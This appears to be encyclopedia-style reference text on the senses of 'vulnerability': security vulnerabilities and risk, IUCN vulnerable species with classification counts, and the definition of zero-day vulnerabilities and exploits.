A security risk is often incorrectly classified as a vulnerability. Using vulnerability with the same meaning as risk can lead to confusion. The risk is the potential of a significant impact resulting from the exploitation of a vulnerability. There are also vulnerabilities without risk, for example when the affected asset has no value. A vulnerability with one or more known instances of working, fully implemented attacks is classified as an exploitable vulnerability, that is, a vulnerability for which an exploit exists. The window of vulnerability is the time from when the security hole was introduced or manifested in deployed software to when access was removed, a security fix was available or deployed, or the attacker was disabled (see zero-day attack).
A security bug (security defect) is a narrower concept: not every vulnerability is a software defect. Hardware, site and personnel vulnerabilities are examples of vulnerabilities that are not software security bugs.
Constructs in programming languages that are difficult to use properly can be a large source of vulnerabilities.
Vulnerable species
A vulnerable species is one which has been categorized by the International Union for Conservation of Nature as likely to become endangered unless the circumstances that are threatening its survival and reproduction improve.
Vulnerability is mainly caused by habitat loss or destruction of the species' home. Vulnerable habitats or species are monitored and can become increasingly threatened. Some species listed as "vulnerable" may be common in captivity, an example being the military macaw.
There are currently 5196 animals and 6789 plants classified as vulnerable, compared with 1998 levels of 2815 and 3222, respectively. Practices such as cryoconservation of animal genetic resources have been adopted in efforts to conserve vulnerable breeds of livestock specifically.
Zero-day (computing)
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). Until the vulnerability is mitigated, hackers can exploit it to adversely affect computer programs, data, additional computers or a network. An exploit directed at a zero-day is called a zero-day exploit, or zero-day attack.
In the jargon of computer security, "Day Zero" is the day on which the interested party (presumably the vendor of the targeted system) learns of the vulnerability. Up until that day, the vulnerability is known as a zero-day vulnerability. Similarly, an exploitable bug that has been known for thirty days would be called a 30-day vulnerability. Once the vendor learns of the vulnerability, the vendor will usually create patches or advise workarounds to mitigate it. The fewer the days since Day Zero, the higher the chance that no fix or mitigation has been developed. Even after a fix is developed, the fewer the days since Day Zero, the higher the probability that an attack against the afflicted software will be successful, because not every user of that software will have applied the fix. For a zero-day exploit no fix exists yet, so patching cannot stop it, and the exploit is expected to succeed against any target that has no other mitigation in place. Zero-day attacks are a severe threat.